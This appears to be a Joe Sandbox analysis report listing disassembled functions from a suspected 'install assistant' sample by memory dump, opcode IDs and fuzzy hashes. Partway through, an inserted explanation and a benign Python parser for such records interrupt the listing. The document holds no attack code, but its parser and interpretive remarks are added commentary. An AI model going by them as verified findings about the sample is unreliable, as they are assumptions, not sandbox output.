                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 04f499f9e3d4c93c3ee3b28235ad2abed55ba3d5e2a4d0777d40b1e79efdc42e
                              • Instruction ID: a761e522d3c525fc36ec0b5c959b48dca8c47a8ec828a48815051f7b423df6d1
                              • Opcode Fuzzy Hash: 04f499f9e3d4c93c3ee3b28235ad2abed55ba3d5e2a4d0777d40b1e79efdc42e
                              • Instruction Fuzzy Hash: 9212A1706087618FC328CF2ED494626FBF2AF85305F188A6ED1D687EA1D735E548CB91
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 197aec8a6e2a317b323f6aae5095031827df40ea46c44a9cbc9116775b6008cc
                              • Instruction ID: 292128810f5ef4885c62a33e62e7ebdb39194384ec07002577c9bdd9f87cbfe5
                              • Opcode Fuzzy Hash: 197aec8a6e2a317b323f6aae5095031827df40ea46c44a9cbc9116775b6008cc
                              • Instruction Fuzzy Hash: EE028E716087608FC328DF2ED49022AFBF1ABC5301F148A6EE5D687AA1D335E555CB51
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 70a9c9e80daef2df3b25ccf8549349f6a1d4fdfd7731b9f920c9a3da36d7342a
                              • Instruction ID: 06a746fecc9dae7d909f82f62cf523bf731c5a205e11569bbd4f2ec1057c7a00
                              • Opcode Fuzzy Hash: 70a9c9e80daef2df3b25ccf8549349f6a1d4fdfd7731b9f920c9a3da36d7342a
                              • Instruction Fuzzy Hash: 06E1EA71704B048BE724CF2CD4A03AEB7E2EBC4314F548A2DC996C7B91DB75A54ACB91
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2bbd660b0b6b3ed67628fad2252f6cf995a3246cee064cb0bfa737aff63ec289
                              • Instruction ID: ae4c85b7a5644697c8e02ba1b94dd63760a696c468c3b362c6c4d0c6af4bcb1d
                              • Opcode Fuzzy Hash: 2bbd660b0b6b3ed67628fad2252f6cf995a3246cee064cb0bfa737aff63ec289
                              • Instruction Fuzzy Hash: DAF1B2706087518FC328CF2DD494266FBE2BF89304F184A6EE5D687EA1D339E554CB91
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                               • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b0f25bae375294626f84eebbb02985cc894b79d37dbce9afd4d280b88824898c
                              • Instruction ID: 587c2c94d310a424e809a49dab63ba56acf8d3c482042fe50823b851d73bcced
                              • Opcode Fuzzy Hash: b0f25bae375294626f84eebbb02985cc894b79d37dbce9afd4d280b88824898c
                              • Instruction Fuzzy Hash: C5F1DFB05087618BC329DF29D49026AFBF2BFC5304F188A3ED4D68ABA1D339E555CB51
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                               • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2d001f70021adf80f04e27e8359f5713b9c218b059c1a64901c9b96791ed9031
                              • Instruction ID: 6f1358499af4f7669fa3e4e784e9c8495c37eaadce42d12abe5f0bcbbb386fdb
                              • Opcode Fuzzy Hash: 2d001f70021adf80f04e27e8359f5713b9c218b059c1a64901c9b96791ed9031
                              • Instruction Fuzzy Hash: 47C1B1B1704B068BE328CF2DC4906AEB7E2FBC4314F548A2DC5A6C7B55D670B496CB81
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                               • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ec689b497c358338b72b358a92d889533f653208c8e8c7d7476938d601be6615
                              • Instruction ID: 81a6bc6454a2be481604cca02946f6dc5117c2dda45f24d9eb7441490cd6a2a1
                              • Opcode Fuzzy Hash: ec689b497c358338b72b358a92d889533f653208c8e8c7d7476938d601be6615
                              • Instruction Fuzzy Hash: 16E1E6B18047A64FE398EF5CDCA4A3577A1EBC8300F4B427DDA650B392D734A942DB94
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                               • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0be95466a501aa6df6135e314a315b2d27713a5a1a3cbbde2114f59cc96eeb67
                              • Instruction ID: acab798f0061495deb607cefc45554c452db6c3a04a4989211ada1187175bc02
                              • Opcode Fuzzy Hash: 0be95466a501aa6df6135e314a315b2d27713a5a1a3cbbde2114f59cc96eeb67
                              • Instruction Fuzzy Hash: DAB140B17062118FC350CF2DC8802597BA2BBC522977597AEC4E49FA6AD336E457CBD0
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                               • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                              • Instruction ID: 99bdba5bae77ae43a34872af9b453753faf5ceed016cf6b9c74322241a84ec53
                              • Opcode Fuzzy Hash: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                              • Instruction Fuzzy Hash: 17C1C1357057418BC718CF3DD0A46A6BBE2EFDA318F148A6DC4CA4BB65DA30A40DCB55
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                               • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 070d0fd322238de923fe1a2eebb0020640b7b085cfb472be6ac79834afb9933a
                              • Instruction ID: 1ed3059ba15a53bcf0212e51ba704752e370f140d112081ca8c9ebc715db7fdf
                              • Opcode Fuzzy Hash: 070d0fd322238de923fe1a2eebb0020640b7b085cfb472be6ac79834afb9933a
                              • Instruction Fuzzy Hash: D3B16F716052508FC350DF2DC484249BBA2FF8532CBB99A9EC4948FA56E376D847CB91
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                               • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1abcbd09df316e1226b3bd6821a11b0a668bf7f1b83a95c986258978a9b95a2f
                              • Instruction ID: 6fc902184e52478be78f141cb43c2bcb183ae4abb7e25fc83e6f4112c11fb029
                              • Opcode Fuzzy Hash: 1abcbd09df316e1226b3bd6821a11b0a668bf7f1b83a95c986258978a9b95a2f
                              • Instruction Fuzzy Hash: 7DD1F8B1848B9A5FD394EF4DEC81A357762AF88301F4A8239DB6007753D634BB12D794
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                               • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 198e3b67c30e49fc889c46f171b82045d2b176faab8633eba47bfa451d0a0751
                              • Instruction ID: 5034a98d52acde562a8741317df0e86fa8e0228987f04e4ec622bf9ccb5e4d19
                              • Opcode Fuzzy Hash: 198e3b67c30e49fc889c46f171b82045d2b176faab8633eba47bfa451d0a0751
                              • Instruction Fuzzy Hash: BDB1E031309B054BD364DF39C8907EBB7E1AF81308F04492DC9AA87B91FF35A54A8799
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                               • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7f5f8248f8a18455fd1713549b4a266ce9d34d374119e8c9520886de18fa66fd
                              • Instruction ID: ffd68ceef75426bab75f8196a401279c741b94261a5dafa296f9e5c69f67c760
                              • Opcode Fuzzy Hash: 7f5f8248f8a18455fd1713549b4a266ce9d34d374119e8c9520886de18fa66fd
                              • Instruction Fuzzy Hash: B0612FB2308215CFD308CF99E580E96B3E5EBA9325B1685BED105CB361E771DC45CB58
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                               • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 482053017e2a7efdb7bc9ab3d96018154e4c77c6c4b2041277a2a90eb64ac0e3
                              • Instruction ID: a7621d7873479dbd705983c3dbaa9323bcea938905207237acdac93109a91aae
                              • Opcode Fuzzy Hash: 482053017e2a7efdb7bc9ab3d96018154e4c77c6c4b2041277a2a90eb64ac0e3
                              • Instruction Fuzzy Hash: 7A81F2B2D487298BD710CF88ECC4596B3A1FB88308F0A467DDE591B352D2B9B915DBD0
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                               • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1e144e3ab01ad0c1374fc479d6e69199773169d0809bfde8fbea9fa4d5497ab0
                              • Instruction ID: b47d5266ab453d3dc44a8a71c72e0619665c0b53877a1be9be0a026f74abb039
                              • Opcode Fuzzy Hash: 1e144e3ab01ad0c1374fc479d6e69199773169d0809bfde8fbea9fa4d5497ab0
                              • Instruction Fuzzy Hash: 429190B2C1871A8BD314CF18D88025AB7E0FB88308F49067DED9AA7351D739EA55CBC5
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                               • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                              • Instruction ID: 75c0f786944a49215c2a9e388d500e46531633b4c2ea6df245561215d6c5a02e
                              • Opcode Fuzzy Hash: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                              • Instruction Fuzzy Hash: 10518F72F0060A9BDB08CFD8D9956ADBBF1EB88348F24816DD516E7781E7749A42CB40
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                               • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                              • Instruction ID: e6aa73080ec5bc195fb22b117f7c7303f51200440d3fca53de9bab792e4c3c97
                              • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                              • Instruction Fuzzy Hash: 8E3114277A441203C70CC96BCD2A79FA1635BD422A70ECB396809DAF55E52CC8534144
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                               • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
                              • Instruction ID: e5def062a473ab15e71119cc1a0dfa2efb4232f46ea4fcf31a3e33aa38ba03cc
                              • Opcode Fuzzy Hash: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
                              • Instruction Fuzzy Hash: 8F310AB3704A058AF2118F2EC9443567763DBC2368F398765D9A687EFCCA7198079185
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                               • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                              • Instruction ID: cb7fb3f1a175ea61562114938c9ad54f1d877e138bb63043c549cd640a132188
                              • Opcode Fuzzy Hash: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                              • Instruction Fuzzy Hash: 4441B2B29087068BD704CF19C89056EB3E4FF88318F454A6DED5AA7791E330EA16CB91
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                               • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d2e9eb99358111aa00ddd4771d36b21c13931b70b848b90c87e332bda565fdca
                              • Instruction ID: bda2430c23b5bd4401b7c5b04b96f613f841678383b107bab5a7d3c6419f7e92
                              • Opcode Fuzzy Hash: d2e9eb99358111aa00ddd4771d36b21c13931b70b848b90c87e332bda565fdca
                              • Instruction Fuzzy Hash: D62128B1A047E647E7209E6DCCC037577D29BC2309F094279DAB48FA87D17994A2D6A0
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                               • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b8de0586c271a62662545cbcc3a7a3f305336ecaaee466a7150af84251bbb2fa
                              • Instruction ID: a11eb7b387d149c01267619beed7b36f827a30667f9e31a6ca7e87a877e00963
                              • Opcode Fuzzy Hash: b8de0586c271a62662545cbcc3a7a3f305336ecaaee466a7150af84251bbb2fa
                              • Instruction Fuzzy Hash: 78016D7291462A57DB189F48CC41136B390FB85312F49823AED469B385E634F971C6D4
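The records in this list are what an analyst pivots on across reports: each function's Opcode ID, Instruction ID and fuzzy hashes, the memory dump it was carved from, and the API names and strings it references (the API ID row joins names with "$", as in "__aulldiv$H_prolog" further down). The following Python is an added example, not code from Joe Security or from this report. It parses these records out of the text export into structured objects and intersects two reports by exact Opcode ID. It assumes only the row labels visible here, that a record ends at its "Instruction Fuzzy Hash" row, and that the "Download File" text the HTML export fuses onto dump-file names is link residue to be stripped; the sample input is constructed for the example.

```python
"""Parse the per-function records of a Joe Sandbox report text export.

Added example, not code from Joe Security or from the report. It relies only
on the labels visible in the report ("Memory Dump Source", "Similarity",
"Opcode ID:", ...) and assumes a record ends at its "Instruction Fuzzy Hash"
row. How the IDs and fuzzy hashes are computed is not on the page, so they
are treated as opaque tokens and matched exactly.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}
SOURCE_RE = re.compile(r"^(?P<file>\S+), Offset: (?P<offset>[0-9A-Fa-f]+), "
                       r"based on PE: (?P<pe>true|false)$")
LINK_RESIDUE = "Download File"  # link label the HTML export fuses onto filenames


@dataclass
class FunctionRecord:
    fields: Dict[str, str] = field(default_factory=dict)      # "Label: value" rows
    associated: List[str] = field(default_factory=list)       # repeatable row
    rows: Dict[str, List[str]] = field(                        # verbatim rows under
        default_factory=lambda: {"APIs": [], "Strings": []})  # "APIs" / "Strings"

    @property
    def opcode_id(self) -> str:
        return self.fields.get("Opcode ID", "")

    def source(self) -> Optional[Tuple[str, int, bool]]:
        """(dump file, offset, based_on_pe) parsed from the 'Source File' row."""
        m = SOURCE_RE.match(self.fields.get("Source File", ""))
        return (m["file"], int(m["offset"], 16), m["pe"] == "true") if m else None

    def api_names(self) -> List[str]:
        """The report joins API names in 'API ID' with '$', e.g. '__aulldiv$H_prolog'."""
        return [n for n in self.fields.get("API ID", "").split("$") if n]


def _field(line: str) -> Tuple[str, str]:
    """'• Label: value' -> ('Label', 'value'); the value may be empty."""
    label, _, value = line.lstrip("• ").partition(":")
    value = value.strip()
    if value.endswith(LINK_RESIDUE):
        value = value[: -len(LINK_RESIDUE)].rstrip()
    return label.strip(), value


def parse_report(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    current, section = FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
        elif section in ("APIs", "Strings"):
            current.rows[section].append(line.lstrip("• "))
        elif section is not None:
            label, value = _field(line)
            if label == "Associated":
                current.associated.append(value)
            else:
                current.fields[label] = value
            if label == "Instruction Fuzzy Hash":  # last row of a record
                records.append(current)
                current, section = FunctionRecord(), None
    # A record cut off before its "Instruction Fuzzy Hash" row (for example
    # at a page boundary) is incomplete and is deliberately not returned.
    return records


def shared_opcode_ids(a: List[FunctionRecord], b: List[FunctionRecord]) -> Set[str]:
    """Functions present in both reports, by exact Opcode ID match."""
    return {r.opcode_id for r in a if r.opcode_id} & {r.opcode_id for r in b if r.opcode_id}


# Constructed samples in the report's layout; IDs and hashes are shortened placeholders.
REPORT_A = """\
APIs
• __EH_prolog.LIBCMT ref: 6CC9A6F1
  • Part of subcall function 6CCA9173: __EH_prolog.LIBCMT ref: 6CCA9178
Strings
Memory Dump Source
• Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
• Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
Similarity
• API ID: __aulldiv$H_prolog
• Opcode ID: a001
• Instruction Fuzzy Hash: A5126A7190060AEF
Similarity
• API ID:
• Opcode ID: a002
• Instruction Fuzzy Hash: DAF1B2706087518F
Similarity
• Opcode ID: a003
"""
REPORT_B = """\
Similarity
• Opcode ID: a002
• Instruction Fuzzy Hash: DAF1B2706087518F
"""

if __name__ == "__main__":
    for r in parse_report(REPORT_A):
        print(r.opcode_id, r.source(), r.api_names(), len(r.rows["APIs"]))
    print("shared:", shared_opcode_ids(parse_report(REPORT_A), parse_report(REPORT_B)))
```

The report does not state how the Opcode/Instruction IDs or the fuzzy hashes are derived, so the example matches them exactly rather than scoring similarity; real fuzzy matching would need the hash algorithm. A record that is cut off before its Instruction Fuzzy Hash row, like the last one in a paginated export, is dropped rather than returned half-filled.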
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                               • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                              • API String ID: 3519838083-609671
                              • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                              • Instruction ID: 38e5f8bd4fad5fba02fc5b8725b3e9bebe307e20467b7aa17e146ad204f8f0fd
                              • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                              • Instruction Fuzzy Hash: F0D18F71A04209DFCB11CFE4D980AEEB7B5FF45708F24459DE056B3A90EB70A949CBA4
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                               • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $ $$ K$, K$.$o
                              • API String ID: 3519838083-1786814033
                              • Opcode ID: 8aabfd49f75e4689d5c64928821ac6bb4626587af6c0d6ffd44deb225edb8441
                              • Instruction ID: e78e1c66c0f7033ec43e1277f0ee5e54ee003cd4d596fade235212b9bc296a72
                              • Opcode Fuzzy Hash: 8aabfd49f75e4689d5c64928821ac6bb4626587af6c0d6ffd44deb225edb8441
                              • Instruction Fuzzy Hash: 95D1F731D0425E8BCF11CFA9C4907EEBBB1BF09308F2A456AC651ABA81E7717D45CB61
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                               • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: __aulldiv$H_prolog
                              • String ID: >WJ$x$x
                              • API String ID: 2300968129-3162267903
                              • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                              • Instruction ID: bbe6e992b49a99e127581ead7446dde61729d90a0e9e163e1d195c191377a4f7
                              • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                              • Instruction Fuzzy Hash: A5126A7190060AEFDF14DFA8C888ADDBBB5FF48318F208169E915EB650E7359986CF50
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                               • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: __aulldiv$__aullrem
